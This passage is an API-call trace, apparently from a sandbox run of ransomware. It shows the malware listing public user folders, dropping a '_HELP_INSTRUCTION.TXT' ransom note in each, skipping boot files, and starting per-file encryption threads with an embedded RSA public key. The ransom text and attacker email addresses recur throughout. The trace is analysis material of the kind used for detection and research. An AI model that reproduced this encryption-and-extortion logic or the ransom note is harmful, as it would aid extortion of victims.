lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0208.798] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0208.798] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xf40) returned 0x0 [0208.798] RegQueryValueExW (in: hKey=0xf40, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4368520, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4368520*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0208.798] RegCloseKey (hKey=0xf40) returned 0x0 [0208.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0208.798] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0208.798] CreateFileW (lpFileName="C:\\Users\\Public\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf40 [0208.798] CloseHandle (hObject=0xf40) returned 1 [0208.798] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0208.798] PathFindFileNameW (pszPath="C:\\Users\\Public\\Favorites") returned="Favorites" [0208.798] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0208.798] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0208.798] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0208.798] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0208.798] SetErrorMode (uMode=0x1) returned 0x1 [0208.799] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0208.799] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0208.799] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Libraries\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0208.799] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Libraries\\*.*") returned="C:\\Users\\Public\\Libraries\\*.*" [0208.799] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0208.799] PathFindFileNameW (pszPath="C:\\Users\\Public\\Libraries") returned="Libraries" [0208.799] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Libraries" | out: lpString1="Libraries") returned="Libraries" [0208.799] StrStrW (lpFirst="50C930C63ECF303723410A464304147F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0208.799] StrStrW (lpFirst="50C930C63ECF303723410A464304147F.XZZX", lpSrch="ntldr") returned 0x0 [0208.799] StrStrW (lpFirst="50C930C63ECF303723410A464304147F.XZZX", lpSrch="NTLDR") returned 0x0 [0208.799] StrStrW (lpFirst="50C930C63ECF303723410A464304147F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0208.799] StrStrW (lpFirst="50C930C63ECF303723410A464304147F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0208.799] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned 30 [0208.799] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Libraries\\") [0208.799] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.799] lstrcpyW (in: lpString1=0x17cf1c, lpString2="50C930C63ECF303723410A464304147F.XZZX" | out: lpString1="50C930C63ECF303723410A464304147F.XZZX") returned="50C930C63ECF303723410A464304147F.XZZX" [0208.799] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned="\\\\?\\C:\\Users\\Public\\Libraries\\" [0208.799] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf48 [0208.799] Sleep (dwMilliseconds=0x96) [0208.952] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0208.952] lstrcmpW (lpString1="721728630B1F6BB259C033230F404FFA.XZZX", lpString2="..") returned 1 [0208.952] lstrcmpW (lpString1="721728630B1F6BB259C033230F404FFA.XZZX", lpString2=".") returned 1 [0208.952] StrStrW (lpFirst="721728630B1F6BB259C033230F404FFA.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0208.952] StrStrW (lpFirst="721728630B1F6BB259C033230F404FFA.XZZX", lpSrch="ntldr") returned 0x0 [0208.952] StrStrW (lpFirst="721728630B1F6BB259C033230F404FFA.XZZX", lpSrch="NTLDR") returned 0x0 [0208.952] StrStrW (lpFirst="721728630B1F6BB259C033230F404FFA.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0208.952] StrStrW (lpFirst="721728630B1F6BB259C033230F404FFA.XZZX", lpSrch="ntdetect.com") returned 0x0 [0208.952] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned 30 [0208.952] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Libraries\\") [0208.952] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0208.952] lstrcpyW (in: lpString1=0x17cf1c, lpString2="721728630B1F6BB259C033230F404FFA.XZZX" | out: lpString1="721728630B1F6BB259C033230F404FFA.XZZX") returned="721728630B1F6BB259C033230F404FFA.XZZX" [0208.952] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned="\\\\?\\C:\\Users\\Public\\Libraries\\" [0208.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf4c [0208.952] Sleep (dwMilliseconds=0x96) [0209.108] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0209.108] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0209.108] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0209.108] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0209.108] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0209.108] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0209.108] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0209.108] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0209.108] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Libraries\\*.*") returned="C:\\Users\\Public\\Libraries\\*.*" [0209.108] SetErrorMode (uMode=0x1) returned 0x1 [0209.108] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Libraries\\_HELP_INSTRUCTION.TXT") returned 47 [0209.108] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0209.108] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0209.108] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xf50) returned 0x0 [0209.109] RegQueryValueExW (in: hKey=0xf50, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4368750, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4368750*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0209.109] RegCloseKey (hKey=0xf50) returned 0x0 [0209.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0209.109] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0209.109] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\libraries\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf50 [0209.109] CloseHandle (hObject=0xf50) returned 1 [0209.109] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0209.109] PathFindFileNameW (pszPath="C:\\Users\\Public\\Libraries") returned="Libraries" [0209.109] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Libraries" | out: lpString1="Libraries") returned="Libraries" [0209.109] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0209.109] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0209.109] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0209.109] SetErrorMode (uMode=0x1) returned 0x1 [0209.109] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0209.109] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0209.109] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Music\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0209.109] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Music\\*.*") returned="C:\\Users\\Public\\Music\\*.*" [0209.109] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0209.109] PathFindFileNameW (pszPath="C:\\Users\\Public\\Music") returned="Music" [0209.109] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0209.109] StrStrW (lpFirst="DE133762273869A1CE952BAA2B594DE9.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0209.109] StrStrW (lpFirst="DE133762273869A1CE952BAA2B594DE9.XZZX", lpSrch="ntldr") returned 0x0 [0209.109] StrStrW (lpFirst="DE133762273869A1CE952BAA2B594DE9.XZZX", lpSrch="NTLDR") returned 0x0 [0209.109] StrStrW (lpFirst="DE133762273869A1CE952BAA2B594DE9.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0209.110] StrStrW (lpFirst="DE133762273869A1CE952BAA2B594DE9.XZZX", lpSrch="ntdetect.com") returned 0x0 [0209.110] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\") returned 26 [0209.110] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Music\\") [0209.110] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.110] lstrcpyW (in: lpString1=0x17cf1c, lpString2="DE133762273869A1CE952BAA2B594DE9.XZZX" | out: lpString1="DE133762273869A1CE952BAA2B594DE9.XZZX") returned="DE133762273869A1CE952BAA2B594DE9.XZZX" [0209.110] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\" [0209.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf58 [0209.110] Sleep (dwMilliseconds=0x96) [0209.265] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0209.265] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0209.265] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0209.265] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0209.265] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0209.265] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0209.265] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0209.265] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0209.265] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0209.265] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Music\\*.*") returned="C:\\Users\\Public\\Music\\*.*" [0209.265] SetErrorMode (uMode=0x1) returned 0x1 [0209.266] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Music\\_HELP_INSTRUCTION.TXT") returned 43 [0209.266] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0209.266] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0209.266] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xf5c) returned 0x0 [0209.266] RegQueryValueExW (in: hKey=0xf5c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4368980, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4368980*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0209.266] RegCloseKey (hKey=0xf5c) returned 0x0 [0209.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0209.266] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0209.266] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf5c [0209.266] CloseHandle (hObject=0xf5c) returned 1 [0209.267] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0209.267] PathFindFileNameW (pszPath="C:\\Users\\Public\\Music") returned="Music" [0209.267] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0209.267] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0209.267] lstrcatW (in: lpString1="C:\\Users\\Public\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0209.267] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\", lpString2="Sample Music" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music") returned="C:\\Users\\Public\\Music\\Sample Music" [0209.267] SetErrorMode (uMode=0x1) returned 0x1 [0209.267] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Music\\Sample Music" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music") returned="C:\\Users\\Public\\Music\\Sample Music" [0209.267] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\Sample Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0209.267] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0209.267] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\Sample Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\*.*") returned="C:\\Users\\Public\\Music\\Sample Music\\*.*" [0209.267] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0209.267] PathFindFileNameW (pszPath="C:\\Users\\Public\\Music\\Sample Music") returned="Sample Music" [0209.267] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Music" | out: lpString1="Sample Music") returned="Sample Music" [0209.268] StrStrW (lpFirst="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0209.268] StrStrW (lpFirst="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX", lpSrch="ntldr") returned 0x0 [0209.268] StrStrW (lpFirst="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX", lpSrch="NTLDR") returned 0x0 [0209.268] StrStrW (lpFirst="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0209.268] StrStrW (lpFirst="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0209.268] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned 39 [0209.268] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") [0209.268] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW 